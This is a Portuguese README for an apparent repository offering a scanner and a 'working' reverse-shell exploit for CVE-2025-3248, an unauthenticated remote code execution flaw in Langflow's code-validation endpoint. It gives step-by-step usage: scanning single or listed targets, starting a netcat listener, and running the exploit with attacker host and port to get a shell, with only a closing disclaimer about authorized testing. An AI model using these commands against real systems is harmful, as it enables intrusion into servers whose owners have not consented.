
Scanner e exploit para CVE-2025-3248, uma RCE não autenticada no Langflow AI. Inclui um verificador de vulnerabilidades e um gerador de payloads de reverse shell para testes de segurança autorizados.
Este repositório contém dois scripts Python:
LangflowCheck.py: Um scanner que verifica instâncias Langflow AI vulneráveis ao CVE-2025-3248.exploit.py: Um exploit funcional de reverse shell para alvos Langflow vulneráveis.CVE-2025-3248 é uma vulnerabilidade crítica no Langflow AI que permite que atacantes não autenticados executem código Python arbitrário remotamente por meio de um payload malicioso enviado para /api/v1/validate/code.
LangflowCheck.py/etc/passwd.exploit.pylhost) e a porta do listener (lport).exploit.log.pip install -r requirements.txt
URL Única
python3 LangflowCheck.py --url http://target.com --output vulnerable_target.txt

Múltiplos Alvos
python3 LangflowCheck.py --file targets.txt --output vulnerable_targets.txt

Primeiro, inicie um listener
sudo nc -nvlp 4444

Em seguida, execute o exploit:
python3 exploit.py --target http://target.com --lhost YOUR_IP --lport 4444

Você deve receber um shell se o alvo for vulnerável.

Este exploit é exclusivamente para fins educacionais e testes de segurança autorizados. Não o utilize contra sistemas que você não possui ou para os quais não tenha permissão explícita para testar.